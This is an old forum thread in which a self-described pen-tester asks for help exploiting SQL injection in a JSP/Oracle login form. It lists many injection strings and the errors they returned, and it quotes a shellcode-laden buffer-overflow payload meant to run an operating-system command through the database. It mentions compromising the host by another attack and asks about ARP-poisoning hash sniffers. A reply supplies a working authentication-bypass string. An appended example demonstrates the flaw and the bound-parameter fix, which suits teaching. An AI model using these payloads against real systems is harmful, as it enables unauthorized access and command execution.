Title: Oracle SQL Injection help... Post by: zgrp on April 12, 2006, 01:53:37 AM

Hello,

This is my first post at this community, I hope I can help others too. I'm pen-testing a host that has applications running in JSP with Oracle as the back-end. I found 2 SQL injections in this application, but I haven't been able to exploit them... if some Oracle SQL injection master can help me :(

The two scripts are like this: One is a login form. Two is a search form, where one of the options (the city field) is vulnerable, so I believe it's an injection in a WHERE clause. My objective is to use the Oracle database to execute commands on the server (I don't care about the data in the database).

If I try in the first one (login form) the following strings (Reference http://www.securityfocus.com/infocus/1644):

    ;select username from all_users where ''x''=''x'
    or exists (select 1 from sys.dual) and ''x''=''x'
    union select username from all_users where ''x''=''x'
    or ''x''=''x'' --'

I get: ORA-01756: quoted string not properly terminated

If I try in the first one (login form) the following string (Reference http://www.appsecinc.com/presentations/oracle_security.pdf):

    UNION select password from DBA_USERS where 'q' = 'q'

I got: ORA-00907: missing right parenthesis

That already looks better, since now it appears there is a "parenthesis" unterminated.

If I try in the first one (login form) the following strings (Reference http://seclists.org/lists/pen-test/2001/Dec/0036.html):

    (SELECT username FROM all_users WHERE 1=1)

I got an HTML access denied message (like when I type a wrong user or password); it appears that subselects don't work.

    ') UNION SELECT username FROM all_users WHERE (''='

I got: ORA-00904: invalid column name

However all_users is a valid table and username is a valid column. :(

1 - Why does this happen? Does anyone know? How can I fix it?

I gained access to the host by another attack and compromised the database, and just out of curiosity I checked it, and it really exists:

    USERNAME
    SYS
    SYSTEM
    OUTLN
    WMSYS
    ORDSYS
    ORDPLUGINS
    MDSYS
    CTXSYS
    XDB
    ANONYMOUS
    WKSYS
    WKPROXY
    ...
    ...

I also found an interesting reference (http://security-papers.globint.com.ar/oracle_security/AdvancedSQLInjectionInOracleDatabases.pdf) where the guy shows the possibility of executing an overflow via SQL injection, with a string like this for example:

    A'||TO_CHAR(MDSYS.MD2.SDO_CODE_SIZE('AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'||CHR(131)||CHR(195)||CHR(9)||CHR(255)||CHR(227)||CHR(251)||CHR(90)||CHR(227)||CHR(120)||CHR(54)||CHR(141)||CHR(67)||CHR(19)||CHR(80)||chr(184)||chr(191)||chr(142)||chr(01)||chr(120)||chr(255)||chr(208)||chr(184)||chr(147)||chr(131)||chr(00)||chr(120)||chr(255)||chr(208)||'dir>c:\dir.txt'))--

2 - If I try it, I get ORA-00907: missing right parenthesis. Does anyone know how I could use it in my example?

3 - Even if it worked, he redirects the output to c:\dir.txt; can't it be sent to stdout (the web page returned from the query)?

4 - Does anyone know a tool where, for example, I find a SQL injection and pass it to the tool, and it makes several tries to detect the right way to make the queries? :)

ps: Off topic, has anyone already had success (or knows how to) compiling programs that use raw sockets/libpcap/libnet with cygwin (like compiling dsniff, ettercap, ...)?

ps2: Or do you know a good command-line password tool for Windows (one that can be installed entirely from the command line) that does ARP poisoning and filters password hashes like NTLM, Oracle, SQL Server, etc.?

Thank you a lot. Cya

Title: Re: Oracle SQL Injection help... Post by: pcsneaker on April 12, 2006, 05:58:44 AM

That's a lot of different things you're trying to do.
Start with the most basic: You said that you want to exploit a login form. The query constructed by a login form usually is something like:

Quote
    select * from users where username =' Content of Textbox1' and password = 'Content of Textbox2'

You mentioned that you tried to enter

Quote
    or ''x''=''x'' --'

and get the error ORA-01756: quoted string not properly terminated. With your input the query will be:

Quote
    select * from users where username =' or ''x''=''x'' --'' and password = 'Content of Textbox2'
                                                           ^^
                                                           2 single quotes

If you modify your input slightly

    ' or 1=1 --

that will give you

Quote
    select * from users where username ='' or 1=1 --' and password = 'Content of Textbox2'
                                        ^^
                                        2 single quotes

Now everything after the second '1' should be ignored and your query should work.

Hint: Try to figure out the query constructed by the form you want to exploit, write it down and look at it after modifying by your input...
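Following the hint above about writing the constructed query down: an added example (not code from either poster) that builds the login statement the way the reply assumes the JSP form does, runs it against a constructed in-memory table, and contrasts it with the bound-parameter form that keeps the input from becoming part of the statement. sqlite3 is assumed only so the demo runs offline; its `--` comment and `''` quoting behave like Oracle's for this purpose.

```python
import sqlite3

# Constructed in-memory table standing in for the application's users
# table; sqlite3 is assumed here only so the demo runs offline.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table users (username text, password text)")
    db.execute("insert into users values ('alice', 's3cret')")
    return db

def build_concat_query(username, password):
    # The construction the reply assumes the JSP login form uses: the two
    # textbox values pasted straight into the SQL text (the vulnerable form).
    return ("select * from users where username ='" + username +
            "' and password = '" + password + "'")

def login_concat(db, username, password):
    """Run the concatenated statement. Returns (rows, error) so a statement the
    parser rejects (the ORA-01756 case in the thread) is reported, not raised."""
    sql = build_concat_query(username, password)
    try:
        return db.execute(sql).fetchall(), None
    except sqlite3.OperationalError as exc:
        return [], str(exc)

def login_bound(db, username, password):
    # Bind parameters: the values travel separately from the SQL text, so a
    # quote or '--' inside them is compared as data, never parsed as syntax.
    sql = "select * from users where username = ? and password = ?"
    return db.execute(sql, (username, password)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for user_input in ["or ''x''=''x'' --'", "' or 1=1 --"]:
        print("input:", user_input)
        print("  built:", build_concat_query(user_input, "guess"))
        print("  concat ->", login_concat(db, user_input, "guess"))
        print("  bound  ->", login_bound(db, user_input, "guess"))
```

The first input breaks the statement (the parser stops at the unterminated quote), the second one returns every row through the concatenated query, and the bound query returns nothing for either because the whole input is matched as a username.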